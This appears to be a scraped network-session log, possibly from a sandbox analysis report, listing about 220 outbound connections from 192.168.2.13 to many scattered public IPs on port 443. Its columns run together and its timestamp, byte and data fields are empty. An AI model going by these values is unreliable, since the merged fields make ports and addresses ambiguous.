                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13278192.168.2.1344702194.70.26.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13279192.168.2.1338630206.155.173.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13280192.168.2.13439505.218.192.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13281192.168.2.133340252.113.225.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13282192.168.2.1334194157.242.239.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13283192.168.2.1338364102.169.29.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13284192.168.2.1335612147.49.119.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13285192.168.2.1357346138.76.250.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13286192.168.2.1335568187.59.7.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13287192.168.2.1339076204.16.239.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13288192.168.2.1342742185.207.216.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13289192.168.2.1356060168.9.81.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13290192.168.2.1351914151.6.33.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13291192.168.2.134851487.251.59.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13292192.168.2.134473884.31.87.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13293192.168.2.134358274.99.229.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13294192.168.2.136086657.213.220.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13295192.168.2.1334144220.47.102.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13296192.168.2.1358520102.190.150.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13297192.168.2.135675617.192.16.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13298192.168.2.136022234.183.105.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13299192.168.2.133505091.17.160.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13300192.168.2.1356084198.90.94.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13301192.168.2.133431843.246.34.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13302192.168.2.1346444197.83.151.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13303192.168.2.1344138181.153.246.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13304192.168.2.1342138129.122.202.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13305192.168.2.1347284183.138.253.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13306192.168.2.1354648184.49.127.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13307192.168.2.13572962.92.207.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13308192.168.2.1344004103.189.102.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13309192.168.2.135354264.147.128.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13310192.168.2.13399782.42.24.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13311192.168.2.1354468201.243.12.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13312192.168.2.133379649.45.62.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13313192.168.2.1354056155.119.147.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13314192.168.2.135118643.122.204.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13315192.168.2.134438232.121.1.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13316192.168.2.133768697.18.167.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13317192.168.2.1353794105.156.79.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13318192.168.2.135560864.142.183.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13319192.168.2.135100299.228.74.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13320192.168.2.134582094.236.204.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13321192.168.2.134353445.98.146.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13322192.168.2.1337490136.1.126.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13323192.168.2.1355598201.229.68.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13324192.168.2.1345096121.188.120.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13325192.168.2.135454068.25.187.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13326192.168.2.1338088178.229.170.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13327192.168.2.1342648138.206.129.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13328192.168.2.1356014121.28.244.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13329192.168.2.1339100162.14.92.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13330192.168.2.135622092.191.110.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13331192.168.2.135132888.84.196.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13332192.168.2.1349188205.174.223.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13333192.168.2.1339058140.112.73.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13334192.168.2.133875836.214.46.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13335192.168.2.135595470.225.178.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13336192.168.2.1352358213.165.184.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13337192.168.2.135276499.128.251.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13338192.168.2.1338332220.156.227.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13339192.168.2.1360060115.244.220.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13340192.168.2.1336036211.157.44.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13341192.168.2.1355478120.174.74.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13342192.168.2.134786420.234.113.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13343192.168.2.1354056203.8.252.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13344192.168.2.1340058166.181.46.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13345192.168.2.1345044111.35.48.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13346192.168.2.1348426183.124.251.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13347192.168.2.135758880.246.191.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13348192.168.2.1342274189.214.216.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13349192.168.2.13504262.133.150.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13350192.168.2.134407266.13.180.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13351192.168.2.1340716174.11.89.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13352192.168.2.13562288.81.21.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13353192.168.2.13419222.174.191.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13354192.168.2.1357718196.249.137.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13355192.168.2.135004069.63.85.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13356192.168.2.1358566144.243.253.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13357192.168.2.133704090.94.125.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13358192.168.2.1339996121.53.164.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13359192.168.2.135256065.140.66.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13360192.168.2.133468053.119.198.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13361192.168.2.1346666182.68.73.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13362192.168.2.133917238.239.190.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13363192.168.2.1359074157.187.34.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13364192.168.2.1360818159.102.147.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13365192.168.2.1342402169.212.19.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13366192.168.2.135998082.45.110.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13367192.168.2.1354640141.54.136.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13368192.168.2.1355752105.170.85.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13369192.168.2.1350496154.9.179.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13370192.168.2.1338774143.18.149.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13371192.168.2.1356942134.52.61.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13372192.168.2.134226494.194.59.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13373192.168.2.1333022222.142.34.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13374192.168.2.133402646.99.157.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13375192.168.2.135939851.0.180.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13376192.168.2.134282247.133.246.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13377192.168.2.1355500205.152.223.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13378192.168.2.134250476.184.151.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13379192.168.2.1346526209.51.198.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13380192.168.2.1355868108.131.149.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13381192.168.2.1347132216.211.55.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13382192.168.2.1345008107.9.24.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13383192.168.2.133673672.218.166.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13384192.168.2.1356530156.130.53.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13385192.168.2.1360290176.245.160.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13386192.168.2.13339548.211.35.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13387192.168.2.1358580189.214.149.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13388192.168.2.133676836.162.207.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13389192.168.2.1340834212.245.29.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13390192.168.2.136020267.55.42.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13391192.168.2.135931484.62.152.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13392192.168.2.1332776209.151.211.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13393192.168.2.13431544.32.220.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13394192.168.2.1355048184.165.235.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13395192.168.2.134382680.183.147.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13396192.168.2.1343952180.169.36.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13397192.168.2.1360482153.42.63.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13398192.168.2.135475695.38.47.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13399192.168.2.133517269.43.225.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13400192.168.2.1335232179.241.62.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13401192.168.2.1356294206.18.76.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13402192.168.2.1351616142.130.140.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13403192.168.2.135095636.91.26.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13404192.168.2.1340304201.205.49.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13405192.168.2.133706684.116.157.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13406192.168.2.1347782189.38.228.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13407192.168.2.1348736135.87.70.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13408192.168.2.135626079.157.86.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13409192.168.2.1351166149.255.67.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13410192.168.2.1339762167.190.187.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13411192.168.2.1334244198.175.241.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13412192.168.2.1358856213.104.9.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13413192.168.2.135566853.31.135.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13414192.168.2.134301068.207.140.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13415192.168.2.1349968185.20.36.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13416192.168.2.134491484.195.204.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13417192.168.2.1339844135.152.1.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13418192.168.2.133327086.177.2.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13419192.168.2.133966635.21.238.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13420192.168.2.1332960108.46.16.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13421192.168.2.1341808131.38.13.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13422192.168.2.1354064150.45.191.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13423192.168.2.1350896160.115.124.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13424192.168.2.13608184.199.34.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13425192.168.2.1357134140.77.117.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13426192.168.2.134251869.60.222.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13427192.168.2.1336348171.146.146.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13428192.168.2.1357724121.242.167.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13429192.168.2.134323864.54.232.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13430192.168.2.134654296.162.51.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13431192.168.2.1337232203.10.45.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13432192.168.2.135039240.114.99.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13433192.168.2.133879625.30.136.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13434192.168.2.1344540112.3.189.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13435192.168.2.1338420149.125.193.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13436192.168.2.1358416142.40.116.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13437192.168.2.1336136160.96.191.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13438192.168.2.1356726113.12.5.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13439192.168.2.1336842220.250.254.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13440192.168.2.1355970185.45.15.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13441192.168.2.134514449.31.31.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13442192.168.2.1347494223.228.243.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13443192.168.2.135804866.11.214.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13444192.168.2.1351844197.120.155.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13445192.168.2.135960063.34.126.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13446192.168.2.1354378161.2.83.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13447192.168.2.1349502161.71.150.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13448192.168.2.1341226206.7.29.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13449192.168.2.1338742173.243.224.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13450192.168.2.1360406163.92.250.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13451192.168.2.1348688112.234.4.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13452192.168.2.13530725.254.215.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13453192.168.2.1355302126.120.112.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13454192.168.2.135774214.181.4.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13455192.168.2.135922886.232.87.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13456192.168.2.1358644181.243.253.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13457192.168.2.1358392155.100.203.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13458192.168.2.1358066193.232.122.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13459192.168.2.1349220199.130.248.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13460192.168.2.1338434109.80.38.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13461192.168.2.1335584106.105.107.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13462192.168.2.1337432156.244.110.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13463192.168.2.133549269.243.108.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13464192.168.2.1336948145.217.238.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13465192.168.2.133608870.67.74.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13466192.168.2.1348264169.106.29.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13467192.168.2.135437262.15.52.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13468192.168.2.133654490.194.215.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13469192.168.2.1351102221.184.242.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13470192.168.2.1339390120.70.109.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13471192.168.2.1344344223.183.242.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13472192.168.2.1333100103.111.61.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13473192.168.2.135297054.215.153.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13474192.168.2.134305669.14.46.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13475192.168.2.1353486120.210.228.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13476192.168.2.1360522118.68.219.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13477192.168.2.1358462156.109.235.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13478192.168.2.135051651.133.253.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13479192.168.2.1353784213.250.112.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13480192.168.2.1356054157.146.57.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13481192.168.2.1333238138.61.121.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13482192.168.2.134164275.3.148.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13483192.168.2.135022084.158.66.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13484192.168.2.1344260196.187.166.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13485192.168.2.1352428151.57.93.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13486192.168.2.1334184162.65.236.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13487192.168.2.136036673.254.115.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13488192.168.2.1347144163.86.19.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13489192.168.2.1337586108.128.39.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13490192.168.2.133665683.126.54.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13491192.168.2.13488064.188.116.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13492192.168.2.1350108212.175.58.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13493192.168.2.1343860137.6.50.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13494192.168.2.135177259.107.115.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13495192.168.2.1346876145.87.159.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13496192.168.2.1354622117.49.30.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13497192.168.2.1358182166.101.85.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13498192.168.2.135987817.121.15.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13499192.168.2.136010024.182.249.133443
